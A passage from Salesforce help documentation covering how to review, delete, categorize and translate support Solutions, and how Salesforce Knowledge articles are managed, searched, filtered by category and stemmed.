card number or payment type.
Solution–Change billing information in the active contract on the account.
1. Open an account by clicking its name on the Accounts home page or an Accounts related
list.
2. Scroll to the Contracts related list and click Edit next to the active contract on the
account.
3. Enter the correct billing information.
4. Click Save.

See Also:
Creating Solutions
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Reviewing Solutions
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on solutionsTo review solutions:

“Manage Published Solutions”To publish solutions:

Solution managers, administrators, and users with the “Edit” permission on solutions can review existing solutions. Solution
managers, administrators, and users with the “Manage Published Solutions” can publish solutions.

1. Click Edit on the solution detail page.
2. Edit the necessary information, and change the Status to Reviewed.
3. Check Visible in Self-Service Portal to make the solution available in your organization’s customer Self-Service

portal and Salesforce Customer Portal.

Note: The Status picklist field on a solution does not need to be set to Reviewed for a solution to be visible in
the Customer Portal; a solution is visible in the Customer Portal if the Visible in Self-Service Portal
checkbox is selected on a solution.

4. Optionally, check Visible in Public Knowledge Base to also make the solution available to users accessing public
solutions.

This field only applies to solutions, not articles in the public knowledge base.

5. Click Save.

For organizations with multilingual solutions, if you modify a master solution that has translated solutions, the Translated
Solutions Status page displays. From there, you can adjust the statuses of translated solutions and notify users to update
those translations.

See Also:
Solution Fields
Creating Solutions
Categorizing Solutions
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Deleting Solutions
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Delete” on solutionsTo delete unpublished solutions:

“Manage Published Solutions”To delete published solutions:

To delete a solution, click Del next to the solution on the solutions list page, or click Delete on the solutions detail page. The
Del link is displayed only for solution managers, administrators, and users with the “Manage Published Solutions” or “Delete”
permission on solutions.

When you delete a solution, all related history and attachments are also deleted. The solution is moved to the Recycle Bin.
Associated cases are not deleted with the solution, but the case associations are removed and are not restored if you later
undelete the solution.

For organizations with multilingual solutions enabled:

• Deleting a master solution does not delete the translated solutions associated with it. Instead, each translated solution
becomes a master solution.

• Deleting a translated solution removes the association with its master solution.

• Undeleting a master or translated solution from the Recycle Bin does not restore its associations with other master or
translated solutions. You can manually restore the associations by modifying the Master Solution lookup field on the
edit page of translated solutions.

• After deleting a translated solution, you can create a new translated solution in the same language. However, you will not
be able to undelete the original translated solution from the Recycle Bin until you delete the second translated solution.

See Also:
Solutions Overview

Categorizing Solutions
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on solutionsTo categorize solutions:

Use solution categories to group similar solutions together. Each solution can belong to more than one category. Once your
solutions are categorized, you can browse for and find solutions by category from the Solutions tab or when solving a case.
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Customers can also browse published solutions by category in public solutions, the Self-Service portal, and the Customer
Portal.

Administrators, and users with the “Manage Categories” permission, can categorize solutions prior to enabling solution
categories for the entire organization. Once solution category browsing is enabled, all users with the appropriate permissions
can categorize solutions.

If multilingual solutions is enabled for your organization, translated solutions inherit solution categories from their master
solutions. The categories on a translated solution are synchronized with the categories on the master solution. To modify a
translated solution's categories, you have to modify the categories of its master solution.

1. View the solution you want to categorize.
2. Click Select Categories in the Solution Categories related list.

This related list is not visible unless your administrator has defined and enabled categories.

3. In the solution category hierarchy, click Select to add a category to the solution. Repeat until you have added all applicable
categories.

We recommend that you limit the number of categories to which a solution belongs. If you put solutions into only the
most relevant categories, they will be easier for users and customers to find.

If necessary, click Deselect to remove a category from the solution.

4. Click Save.

To later remove a category from a solution, click Del in the Solution Categories related list on the solution detail page.

Note:  You can create a custom report on solution categories. However, solution category information is not available
in list views.

See Also:
Searching for Solutions
Solving Cases

Setting Multilingual Solution Statuses
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on solutionsTo change the status of translated solutions:

After you modify a master solution, you can adjust the statuses of each translated solution associated with it and notify users
to update those translations, if necessary:

1. Choose a status for the translated solution from the Status picklist. For example, Draft, Reviewed, or Duplicate. The
picklist values available for you to choose from are set by your administrator.
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2. Select the Out of Date checkbox to indicate that the master solution has been updated and that the translated solution
may need translating. The translated solution will be marked Out of Date on the Translated Solution related list of the
master solution.

3. Select the Send Notification checkbox if you want the last active user who created or modified the solution to receive
an email notifying them that the master solution has been updated and that the translated solution may need translating.

The user displayed in the Notification Recipient column will receive the email. Email notices are system-generated
and cannot be modified. The email notification is in the language of the notification recipient.

4. Click Save.

See Also:
Multilingual Solutions Overview
Solution Fields

Solutions Home
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on solutionsTo view Solutions tab:

“Read” on solutionsTo view solutions:

“Create” on solutionsTo create solutions:

Clicking on the Solutions tab displays the solutions home page.

• Under Find Solutions, enter keywords to search for a solution. If your organization uses categories, optionally select a
category in which to search. If multilingual solutions is enabled for your organization, search results return solutions in all
languages that have matching keywords. However, search results across all languages might not be reliable because terms
searched from one language to another are processed differently.

• In the Browse Solutions section, click a category name to view a list of solutions in that category and its subcategories.

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views. To edit or delete any view you created, select it from the View drop-down list and click Edit.

• In the Recent Solutions section, select an item from the drop-down list to display a brief list of the top solutions matching
that criteria. From the list, you can click any solution name to go directly to the solution detail. Toggle the Show 25 items
and Show 10 items links to change the number of items that display. The fields you see are determined by the “Solutions
Tab” search layout defined by your administrator and by your field-level security settings (available in Enterprise, Unlimited,
and Developer Editions only). The Recent Solutions choices are:

DescriptionRecent Solutions Choice

The last ten or twenty-five solutions you viewed, with the
most recently viewed solution listed first. This list is derived

Recently Viewed
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DescriptionRecent Solutions Choice

from your recent items and includes records owned by you
and other users.

• In the Recent Solutions section, click New to create a solution.

• Under Reports, click any report name to display that report. The Solution List report allows you to report on any solution
field.

See Also:
Solutions Overview
Creating Solutions
Searching for Solutions

Solution History
Available in: Professional, Enterprise, Unlimited, and Developer Editions

The Solution History related list of a solution detail page tracks changes to the solution. Any time a user modifies any of the
standard or custom fields whose history is set to be tracked on the solution, a new entry is added to the Solution History related
list. All entries include the date, time, nature of the change, and who made the change. Modifications to the related lists on
the solution are not tracked in the solution history.

See Also:
Solutions Overview
Solution Fields

Solution Fields
Available in: Professional, Enterprise, Unlimited, and Developer Editions

A solution has the following fields, listed in alphabetical order.

DescriptionField

User who created the solution including creation date and
time. (Read only)

Created By

The language in which a solution is written.

Available for organizations with multilingual solutions enabled.

Language

1849

Solution HistorySolutions



DescriptionField

The solution with which a translated solution is associated
and from which its title and details are derived.

Available for organizations with multilingual solutions enabled.

Master Solution

Detailed description of the master solution from which a
translated solution's details are derived. (Read only)

Available for organizations with multilingual solutions enabled.

Master Solution Details

Title of the master solution from which a translated solution's
title is derived. (Read only)

Available for organizations with multilingual solutions enabled.

Master Solution Title

User who last changed the solution fields, including
modification date and time. This does not track changes made
to any of the related list items on the solution. (Read only)

Modified By

Link to printable view of the case that was used to create the
solution. Displays only if the solution was created when the

Open Case Detail

case was closed. Displays only when editing a solution. (Read
only)

Checkbox that indicates that a translated solution's title and
details may need translating to match the title and details of
the master solution with which it is associated.

Available for organizations with multilingual solutions enabled.

Out of Date

Detailed description of the solution. Up to 32 KB of data are
allowed.

Solution details are either displayed in text or HTML,
depending on how your organization is set up.

Solution Details

When the HTML solution detail is displayed in list views and
search results, only the first 255 characters are displayed. This
number includes HTML tags and images that are removed.

Automatically generated identifying number. (Read only)
Administrators can modify the format and numbering for this
field.

Solution Number

Title of the solution describing the customer’s problem or
question.

Solution Title

Status of the solution, for example, Draft, Reviewed. Entry is
selected from a picklist of available values, which are set by an
administrator. Each picklist value can have up to 40 characters.

Status

Indicates the solution is available in the Self-Service Portal
and Customer Portal.

Visible in Self-Service Portal
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DescriptionField

Indicates the solution is a public solution.

This field only applies to solutions, not articles in the public
knowledge base.

Visible in Public Knowledge Base

Listing of custom links for solutions set up by your
administrator.

Custom Links

See Also:
Creating Solutions
Displaying and Selecting Solutions

Solutions FAQ
Available in: Professional, Enterprise, Unlimited, and Developer Editions

• What is a solution manager?

• Why are solutions used?

• What is the difference between a solution and a FAQ?

• How can I write good solutions?

• What should I look for when I review solutions?

• What are the Visible in Self-Service Portal and Visible in Public Knowledge Base checkboxes on a solution?

What is a solution manager?
A solution manager can edit, delete, and make solutions visible in the Self-Service Portal and Customer Portal and visible in
public solutions. Typically, these individuals are product experts with excellent written communication skills and advanced
knowledge in a particular area of your product. To designate one or more users as solution managers, your administrator can
assign those users to the Solution Manager profile when creating or editing the users’ personal information.

See Also:
Solutions FAQ
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Why are solutions used?
Solutions provide a quick means to identify and resolve a customer issue. By capturing customer issues and structuring findable,
reusable solutions, your customer support team can leverage existing knowledge to provide answers to issues that have been
solved previously, increasing customer satisfaction and your team’s productivity.

See Also:
Solutions FAQ

What is the difference between a solution and a FAQ?
A FAQ serves mostly as a useful tip for how the product or service is supposed to work. Solutions answer customer questions
when the product or service is not working as expected. Because customers’ expectations may not always be accurate, a solution
may describe how the product or service is supposed to work (very similar to a FAQ), help troubleshoot a problem, or provide
a work-around to a bug or product limitation.

See Also:
Solutions FAQ

How can I write good solutions?
A good solution is reusable, easy to find, and technically accurate. For more information, download Tips & Hints for Solutions.

See Also:
Solutions FAQ

What should I look for when I review solutions?
Solution managers can use these guidelines when reviewing solutions:

1. Structure: The solution should include a clear title, the symptom(s), cause, and resolution.
2. Language: The solution should be clear and easy to read in the language of the customer.
3. No Customer-Specific Information: Solutions should never contain customer-specific information.
4. Technically Accurate: The solution should accurately and effectively solve the problem posed by the customer.
5. Professional: Check for spelling and correct sentence structure.
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6. Sensitivity: The solution should not contain any confidential or proprietary information that you wouldn't want a competitor
to read.

See Also:
Solutions FAQ

What are the Visible in Self-Service Portal and Visible in Public Knowledge
Base checkboxes on a solution?

The Visible in Self-Service Portal and Visible in Public Knowledge Base checkboxes, when selected,
indicate that a solution is available for external use on your organization’s Self-Service Portal and Customer Portal and public
solutions. Solutions available for external use are regarded as published.

Visible in Public Knowledge Base only applies to solutions, not articles in the public knowledge base.

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

See Also:
Solutions FAQ

SALESFORCE KNOWLEDGE

Salesforce Knowledge Overview
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

Salesforce Knowledge is a knowledge base where users can easily create and manage content, known as articles, and quickly
find and view the articles they need. After you set up Salesforce Knowledge in your organization, users can write, edit, publish,
and archive articles using the Articles Management tab or find and view published articles using the Articles tab. Customers
and partners can access articles if Salesforce Knowledge is enabled in the Customer Portal or partner portal. You can also
create a public knowledge base so website visitors can view articles.

Salesforce Knowledge provides the following features and tasks to help you efficiently manage your knowledge base and its
users:

Using Article Types

Article types are custom containers for your articles. Every article belongs to a type that determines its content and
structure. Administrators define article types by creating custom fields to capture article data, grouping or reorganizing

1853

Salesforce Knowledge OverviewSalesforce Knowledge



the fields as needed on the layout, and choosing an article-type template. The article-type template determines how the
layout appears to viewers of the published article, and administrators can choose unique templates for different audiences
and article types. Salesforce provides two standard article-type templates, Tab and Table of Contents, and you can use
Visualforce to create custom templates.

Categorizing Articles

Data categories classify articles in Salesforce Knowledge. This classification helps users find articles and allows
administrators to control article visibility. After data categories have been set up, article managers can assign the relevant
categories to draft articles. When end users are searching for published articles in any channel—Internal App, Customer,
Partner, or Public Knowledge Base—they can use the categories to help locate information. If your organization uses a
role hierarchy, access to data categories is determined by the user's role.

Managing Articles

On the Article Management tab, article managers can create new articles as well as find and manage existing articles in
any phase of the knowledge life cycle:
1. Create and save a new article.
2. Reassign the article to an editor, translator, reviewer, or any other collaborator as needed. That person can reassign

the article as many times as necessary until the content is ready for publication. If an approval process is set up for
the article type, you or the person you reassign to submits the article for approval. The article is routed to the
appropriate approver or set of approvers, who either approve or reject it.

3. Publish the completed draft to one or more channels, depending on the audiences you've configured: the Articles
tab in your Salesforce organization, a customer portal, a partner portal, or a public knowledge base. You can schedule
the article to be published on a future date.

4. Update the article as needed. When modifying a published article, you can either remove it from publication so that
the original is no longer visible to users, or leave the original published and work on a copy until you're ready to
replace the original with your update.

5. Archive the article when it is obsolete to remove it from publication. As with publishing an article, you can archive
immediately or on a future date.

6. Delete the article as needed, or turn it into a draft and begin a new publishing cycle.

Creating Articles

Authors create articles by selecting an article type, writing content, assigning categories, and choosing one or more
channels. Depending on the article type, several fields may be available for different types of data.

Supporting Multiple Languages

With multiple languages for Salesforce Knowledge you can lower support costs by translating articles into the languages
your audience prefers. After an administrator selects your language settings, two translation methods are available:
translating articles in-house using the editing tool in the knowledge base, or sending articles to a localization vendor.
Different languages can use different methods. For example, you may want to export articles to a vendor for French
translations, but assign articles to a Salesforce Knowledge user for Spanish translations.

Using Articles to Solve Cases

Salesforce Knowledge and cases combine to provide a powerful customer support tool. To search the knowledge base
directly from a case and attach related articles to the case for convenient reference, add the Articles related list to case
page layouts. When closing a case, support agents can easily create a new article to capture important information and
help solve future cases more quickly.
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Searching for Articles

Finding articles in Salesforce Knowledge is quick and easy. Enter a search term on the Articles tab to initiate a full-text
search of the knowledge base and narrow your search by selecting specific article types and categories. When the beta
version of search spell correction is enabled, the system searches and retrieves alternate spellings for English search terms.
You can filter search results by language, validation status, and category and sort the list view according to several criteria
such as highest-rated or most-viewed. On the Article Management tab you can search for a specific article within the
chosen list view. The Article Search component allows you to search for articles from the Home tab.

Rating Articles

Internal app, Customer Portal, and partner portal users can rate articles on a scale of 1 to 5 stars and view the average
rating for an article. Average ratings are not static. Every 15 days, if an article has not received a new vote, its average
moves up or down according to a half-life calculation. This change ensures that over time, older or outdated articles
don't maintain artificially high or low ratings compared to newer, more frequently used articles. Articles without recent
votes trend towards an average rating of 3 stars. The Articles tab also allows users to compare the ratings for different
articles and sort the list view according to highest or lowest rated articles.

Note:

Articles with no votes have the same average rating as articles with 3 stars.

See Also:
Salesforce Knowledge Terminology

Salesforce Knowledge Terminology
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

The following terms are used when describing Salesforce Knowledge features and functionality.

Archived Article

Archived articles were published but later removed from public visibility. Article managers can view and manage archived
articles on the Article Management tab by clicking the Articles tab in the View area and choosing Archived Articles.
Archived articles are not visible in the Articles tab (in any channel) or the public knowledge base. Articles can be archived
manually or automatically via an expiration date.

Article

Articles capture information about your company's products and services that you want to make available in your knowledge
base.

Article Manager

Salesforce uses the term article manager to represent a specific type of user. Article managers can access the Article
Management tab to create, edit, assign, publish, archive, and delete articles. Article managers are sometimes referred to
as knowledge managers. Article managers require the “Manage Articles” user permission. The Article Management tab
is not visible to users without “Manage Articles.”
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Article Type

All articles in Salesforce Knowledge are assigned to an article type. An article's type determines the type of content it
contains, its appearance, and which users can access it. For example, a simple FAQ article type might have two custom
fields, Question and Answer, where article managers enter data when creating or updating FAQ articles. A more
complex article type may require dozens of fields organized into several sections. Using layouts and templates,
administrators can structure the article type in the most effective way for its particular content. User access to article
types is controlled by permissions. For each article type, an administrator can grant “Create,” “Read,” “Edit,” or “Delete”
permissions to users. For example, the article manager might want to allow internal users to read, create, and edit FAQ
article types, but let partner users only read FAQs.

Article-Type Layout

An article-type layout enables administrators to create sections that organize the fields on an article, as well as choose
which fields users can view and edit. One layout is available per article type. Administrators modify the layout from the
article-type detail page.

Article-Type Template

An article-type template specifies how the sections in the article-type layout are rendered. An article type can have a
different template for each of its four channels. For example, if the Customer Portal channel on the FAQ article-type
is assigned to the Tab template, the sections in the FAQ's layout appear as tabs when customers view an FAQ article.
For the Table of Contents template, the sections defined in the layout appear on a single page (with hyperlinks) when
the article is viewed. Salesforce provides two standard article-type templates, Tab and Table of Contents. Custom
templates can be created with Visualforce.

Category Group for Articles

In Salesforce Knowledge, a category group organizes data categories into a logical hierarchy. For example, to classify
articles by sales regions and business units, create two category groups, Sales Regions and Business Units. The Sales
Regions category group could consist of a geographical hierarchy, such as All Sales Regions as the top level, North
America, Europe, and Asia at the second level, and so on up to five levels. When creating articles, authors assign the
relevant categories to the article. End users searching for articles can search and filter by category.

Channel

A channel refers to the medium by which an article is available. Salesforce Knowledge offers four channels where you
can make articles available.
• Internal App: Salesforce users can access articles in the Articles tab depending on their role visibility.

• Customer: Customers can access articles if the Articles tab is available in the portal. Customer Portal users inherit
the role visibility of the manager on the account.

• Partner: Partners can access articles if the Articles tab is available in the portal. Partner portal users inherit the role
visibility of the manager on the account.

• Public Knowledge Base: Articles can be made available to anonymous users by creating a public knowledge base
using the Sample Public Knowledge Base for Salesforce Knowledge app from the AppExchange. Creating a public
knowledge base requires Sites and Visualforce.

• Your own website. Articles can be made available to users through your company website.

Data Category for Articles

In Salesforce Knowledge, data categories are a set of criteria organized hierarchically into category groups. Articles in the
knowledge base can be classified according to multiple categories that make it easy for users to find the articles they need.
For example, to classify articles by sales regions and business units, create two category groups, Sales Regions and Business
Units. The Sales Regions category group could consist of a geographical hierarchy, such as All Sales Regions as the top
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level, North America, Europe, and Asia at the second level, and so on up to five levels. Authors assign categories to
articles. Administrators can use data categories to control access to articles.

Draft Article

Draft articles are in-progress articles that have not been published, which means they are not visible on the Articles tab
(in any channel) or in a public knowledge base. Article managers can access draft articles on the Article Management
tab by clicking the Articles tab in the View area and choosing Draft Articles. You can filter draft articles by those
assigned to you or those assign to anyone (all draft articles for your organization). Draft articles can be assigned to any
user involved in the editorial work.

Draft Translation

Draft translations are in-progress translations of articles into multiple languages. They have not been published, which
means they are not visible on the Articles tab (in any channel) or in a public knowledge base. Article managers can access
draft translations on the Articles Management tab by clicking the Translations tab in the View area and choosing Draft
Translations. You can filter draft translations by those assigned to you, those assigned to a translation queue, or those
assigned to anyone (all draft translations in your organization). Translations can be assigned to any user who can publish
Salesforce Knowledge articles.

Knowledge Agent

Salesforce uses the term knowledge agent to represent a specific type of user. Knowledge agents are article consumers in
the internal Salesforce Knowledge app. These users can access the Articles tab to search for and view articles, but they
cannot create, edit, or manage articles.

Published Article

Published articles are available on the Articles tab in the internal app and, if applicable, in the Customer Portal, partner
portal, and public knowledge base. To remove a published article, you can archive it or change its status to “draft” on
the Article Management tab. To access published articles on the Articles Management tab, click the Articles tab in the
View area and choose Published Articles.

Published Translation

Published translations are articles translated into multiple languages that are available on the Articles tab in the internal
app and, if applicable, in the Customer Portal, partner portal, and public knowledge base. To remove a published
translation, you can archive it or change its status to “draft” on the Article Management tab. To access published
translations on the Articles Management tab, click the Translations tab in the View area and choose Published
Translations.

See Also:
Salesforce Knowledge Overview
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Searching for Articles
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on the article typeTo view published articles in the Articles tab or Articles related
list:

“Manage Articles”

AND

“Read” on the article type

To view draft, published, or archived articles in the Article
Management tab:

• Searching for Articles in the Articles Tab

• Searching for Articles in the Article Management Tab

• Searching for Articles from Cases

• Searching for Articles Using Global Search

Searching for Articles in the Articles Tab

By default the Articles tab displays articles that were created or modified during the last 30 days. To find an article, use the
search tools in the sidebar. When the beta version of search spell correction is enabled, the system suggests an alternative
search term if it can’t find the original search term in the English dictionary. Click the link for the search term you want and
you’ll see the results for that term.

1. Enter your search terms in the Search box. You can use search wildcards and operators in your search terms.

Note:  If you click Go without entering a search term or selecting an article type, validation status, or category,
your search results contain articles that were created or modified in the last 30 days. An empty search does not
return all published articles in the knowledge base.

2. Optionally, select one or more article types that you want to search for.
3. Click Go.
4. Optionally, select filters to refine your search results.

Tip:  If your Home tab includes an article search component, you can also search for articles from the Home tab.
Enter your search terms in the Find Articles field.

Searching for Articles in the Article Management Tab

On the Article Management tab you can view articles in any phase of the publishing life cycle and then search for a specific
article within the chosen list view. The default list view on the Article Management tab contains draft (unpublished) articles
that are assigned to you. When the beta version of search spell correction is enabled, the system searches and retrieves alternate
spellings for English search terms.

To find an article, use the search tools in the View area.

1. Click the Articles tab.
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2. Choose Draft Articles, Published Articles, or Archived Articles. You can filter draft articles by those assigned to you or
those assign to anyone (all draft articles for your organization).

3. Optionally, enter your search terms in the Find in View box. You can use search wildcards and operators in your search
terms. Click Go.

4. Click Go.
5. Optionally, select filters to refine your search results.

Searching for Translations in the Article Management Tab

On the Article Management tab you can view translations in any phase of the article translation cycle and then search for a
specific translation within the chosen list view.

To find an article, use the search tools in the View area:

1. Click Translations.
2. Choose Draft Translations or Published Translations. You can filter draft translations by those assigned to you, those

assigned to a translation queue, or those assigned to anyone (all draft translations in your organization).
3. Optionally, enter your search terms in the Find in View box. You can use search wildcards and operators in your search

terms. Click Go.
4. Click Go.
5. Optionally, select filters to refine your search results.

Searching for Articles from Cases

Use the Articles related list on the case detail page to search for Salesforce Knowledge articles that may help you solve the
case. If you find relevant articles, you can attach them to the case, where they are easily accessible for the life of the record or
until detached or deleted. If your organization translates articles, you can add a translated version of an article to a case.

If you don't find a solution in the suggested articles, you can create an article by clicking New. When the beta version of search
spell correction is enabled, the system searches and retrieves alternate spellings for English search terms.

1. On the case detail page, click Find Articles from the Articles related list. The case subject is used automatically as a search
term to provide an initial list of search results.

2. In the sidebar of the Articles page, narrow your search results by article type or category.
3. Optionally, select filters to refine your search results.
4. When you find an article that's relevant to the case, select the article's checkbox and then click Attach to Case or Attach

and Go to Case.

Note:  You can't attach or detach an article from the Articles page. Instead, return to the case detail page and attach
or detach the article from the Articles related list.

Searching for Articles Using Global Search

When using global search, you can select Search Options from the drop-down and select Articles to narrow your search
results.

If you're in a multiple language Salesforce Knowledge organization, global search article results are in your default personal
language. If your default personal language is not supported by Salesforce Knowledge, your results are in your organization's
knowledge base default language.

Using Filters to Narrow Your Results List

After you’ve retrieved your search results, you can narrow the results list by using filters.

• Use the Article Language filter to search for articles by language within your results.
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• If your organization uses categories, you can filter the list view by selecting one or more categories.

Note:

◊ If an article has no categories, it displays only when you choose the No Filter option in the category
drop-down menu.

◊ When searching for articles or article translations, selecting a category automatically includes the parent and
children of that category and any grandparents, up to and including the top level. Sibling categories are not
included. For example, if a category hierarchy has the levels All Products, Switches, Optical Networks, and
Metro Core, selecting “Optical Networks” from the category drop-down menu returns articles assigned to any
of the four categories. However, if the Switches category has a sibling category called Routers, selecting “Optical
Networks” does not return articles classified within Routers. Category visibility settings may limit the specific
articles you can find.

◊ If your organization uses roles, users who are not assigned to a role can only view uncategorized articles.
◊ If you only have access to one category in a category group, the category drop-down menu for that category

group does not display on the Articles tab.

• If enabled, select a validation status to narrow the search by the article’s state in the publication cycle.

See Also:
Example of Article Search Results
Stemming Behavior with Salesforce Knowledge Article Searches
The Articles Tab

Understanding Article Search Results

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on the article typeTo view published articles in the Articles tab or Articles related
list:

“Manage Articles”

AND

“Read” on the article type

To view draft, published, or archived articles in the Article
Management tab:

How search works for articles depends on your use of search options, search terms, wildcards, and operators. Salesforce
Knowledge article search uses the following mechanisms to return relevant search results:

Tokenization

The tokenization process breaks down all searchable text into individual pieces and stores them in indexes used for
matching. Searches with multiple words separated by spaces or punctuation are split into multiple tokens. For example,
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the search acme inc is split into the tokens acme and inc.  Searches with words that contain both letters and numbers
are also split up, so the search web2lead is split into the tokens web, 2, and lead.

Stemming

Stemming is the process of reducing a word to its root form. With stemming, search can match expanded forms of a
search term. For example, a search for run matches items that contain run, running, and ran. This behavior applies only
to the type of word you search for: a search for a noun matches variants of the noun form, a search for a verb matches
variants of the verb form, and so on. Stemming is available only for articles are that are marked as being in one of these
languages: Danish, Dutch, English, French, German, Hebrew, Italian, Korean, Norwegian, Portuguese, Romanian,
Russian, Spanish, or Swedish. Additionally, the search must be initiated by a user who is viewing the application in one
of these languages. You can edit the default language for your organization on the Company Information page.

Stopword Lists

Each supported language has a list of words that are ignored in search terms (for example, “the,” “to,” and “for”). These
words are removed from the search and are not matched on to avoid irrelevant results.

Operators

Knowledge search uses "OR" as its default operator.  This means that when there are multiple search terms, all of the
terms don’t need to match to generate a result. An article that matches any of the search query terms appears in the
result. The search engine boosts documents that contain more terms from the search query, so that they appear higher
in the results list.

Many factors influence the order in which articles appear in the results list. Salesforce evaluates your search terms and your
data to move more relevant matches higher in your list of results. Some of these factors include:

Frequency

This algorithm calculates the frequency with which a term appears within each article. The algorithm then weighs them
against each other in order to produce the initial set of search results. 

Relevancy

Articles that are frequently viewed or that are frequently attached to cases appear higher in the results. Sidebar, advanced,
and global searches also boost articles , record ownership and recent activity also boost an article in the results list.

Proximity of Terms

Articles that contain all of the keywords in a search are ranked highest, followed by those with fewer keywords, followed
by those with single keyword matches. Terms that are closer together in the matched document, with few or no intervening
words, are ranked higher in the list.

Exact Matches

Matches on exact keywords are ranked higher than matches on synonyms or stemmed terms.

Title Field

If any search terms match words in an article title, the article is boosted in the search results.
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Token Sequence

If the search term is broken up into multiple tokens because it contains both letters and numbers, the system boosts
matches based on the same sequence of tokens. That way, exact matches are ranked higher than matches on the tokens
with other tokens in between.

See Also:
Searching for Articles

Example of Article Search Results

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on the article typeTo view published articles in the Articles tab or Articles related
list:

“Manage Articles”

AND

“Read” on the article type

To view draft, published, or archived articles in the Article
Management tab:

When you search for articles, you can narrow your search results by selecting categories. The following table is an in-depth
example of how filtering by categories works. This example uses the sample category groups Products and Geography and
three sample articles. Assume that the user performing the search has access to all categories.

Table 2: Example: How Filtering by Categories Narrows Article Search Results

An article assigned to Europe
only is...

An article assigned to Canada
AND Computers is...

An article assigned to All
Countries AND Laptop is...

If you select these category
filters...

NOT FOUND. Reasons:FOUND. Reasons:FOUND. Reasons:All Countries

AND • Europe is a child of All
Countries, but all filter
criteria must be met.

• Canada is a child of All
Countries.

• All Countries is an exact
match.

All Products •• Computers is a child of All
Products.

Selecting All Products
automatically includes
Laptop.

• The article is not assigned
to a Products category. To
retrieve this article, choose
No Filter from the
category drop-down menu.

NOT FOUND. Reasons:NOT FOUND. Reasons:FOUND. Reasons:Asia

AND • Europe and Asia are
siblings rather than

• Canada and Asia are not
in the same parent/child

• All Countries is the parent
of Asia.

Computers
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An article assigned to Europe
only is...

An article assigned to Canada
AND Computers is...

An article assigned to All
Countries AND Laptop is...

If you select these category
filters...

members of the same
parent/child hierarchy.

hierarchy (that is, they are
in different branches of the
category hierarchy).

• Laptop is a child of
Computers.

• If an article is not assigned
to a category, “No Filter”• Computers is an exact

match, but all filter criteria must be selected in the
must be met before an
article is displayed.

corresponding category
drop-down menu to
retrieve the article.

NOT FOUND. Reasons:NOT FOUND. Reasons:NOT FOUND. Reasons:France

AND • Europe is the parent of
France but all filter criteria
must be met.

• Canada and France are not
members of the same
parent/child hierarchy
(they are cousins).

• Laptop is not in a
parent/child relationship
with Enterprise
Electronics.

Enterprise Electronics

• If an article is not assigned
to a category, “No Filter”•• Computers and Enterprise

Electronics are not
All Countries is a parent
of France but all filter
criteria must be met.

must be selected in the
corresponding category
drop-down menu to
retrieve the article.

members of the same
parent/child hierarchy
(they are siblings).

FOUND. Reasons:NOT FOUND. Reasons:NOT FOUND. Reasons:Europe

(No other filter) • Europe is an exact match.• Europe and Canada are
not in the same
parent/child hierarchy.

• The No Filter criteria on
Products only retrieves an
article assigned to No
Categories.

• On Products, the article is
assigned to No Categories
and “No Filter” was chosen
as a filter.

• The “No Filter” criteria on
Products only retrieves an
article assigned to No
Categories.

• All Countries is the
grandparent of Europe,
but all filter criteria must
be met.

NOT FOUND. Reasons:FOUND. Reasons:NOT FOUND. Reasons:Americas

AND • America and Europe are
siblings rather than

• Canada is the child of
America.

• Laptop and Desktop are
siblings rather than

Desktop members of the same
parent/child hierarchy

members of the same
parent/child hierarchy.

• Computers is the parent of
Desktop.

• •All Countries is the parent
of America, but all filter
criteria must be met.

If an article is not assigned
to a category, “No Filter”
must be selected in the
corresponding category
drop-down menu to
retrieve the article.
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Products Category Group

• All Products

◊ Consumer Electronics

- Cameras

- Audio

- Printers

◊ Enterprise Electronics

- Routers

- Switches

- PEX

◊ Computers

- Laptops

- Desktops

- PDAs

Geography Category Group

• All Countries

◊ Americas

- USA

- Canada

- Brazil

◊ Asia

- China

- Japan

- India

◊ Europe

- France

- United Kingdom

- Poland

See Also:
Searching for Articles
Stemming Behavior with Salesforce Knowledge Article Searches
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Stemming Behavior with Salesforce Knowledge Article Searches

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on the article typeTo view published articles in the Articles tab or Articles related
list:

“Manage Articles”

AND

“Read” on the article type

To view draft, published, or archived articles in the Article
Management tab:

Stemming is the process of reducing a word to its root form. With stemming, search can match expanded forms of a search
term. For example, a search for run matches items that contain run, running, and ran. This behavior applies only to the type
of word you search for: a search for a noun matches variants of the noun form, a search for a verb matches variants of the verb
form, and so on.

Note: Stemming is available only for articles are that are marked as being in one of these languages: Danish, Dutch,
English, French, German, Hebrew, Italian, Korean, Norwegian, Portuguese, Romanian, Russian, Spanish, or Swedish.
Additionally, the search must be initiated by a user who is viewing the application in one of these languages. You can
edit the default language for your organization on the Company Information page.

Be aware of these stemming behaviors in Salesforce Knowledge article searches:

Wildcards

If a search phrase includes an asterisk (*), none of the search terms are stemmed. For example, a search for quenching
bev* doesn't match quench or quenched.

Exact phrase searches

If a search includes a phrase within quotation marks ("), then the search terms are stemmed. For example, a search for
"drink juice" delicious matches drank juices and deliciously.

Note:  If all of the search terms are in quotes and the last character is a question mark (?), the search terms are
stemmed. For example, a search for "drink juice?" matches drank juices. However, if a question mark is
included anywhere else, the search terms are not stemmed. For example, a search for "drink? juice" doesn't
match drank juices, and a search for delicious "drink juice?" doesn't match deliciously or drank juices.

Synonyms

A defined synonym is not stemmed in search results; rather, it is matched as an exact phrase. However, the search term
is stemmed. For example, if this synonym group is defined:

quench, drink orange juice
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Then a search for quench matches quench, quenched, quenching, and drink orange juice, but doesn't match drinking orange
juice.

See Also:
Searching for Articles
Example of Article Search Results

Viewing Articles
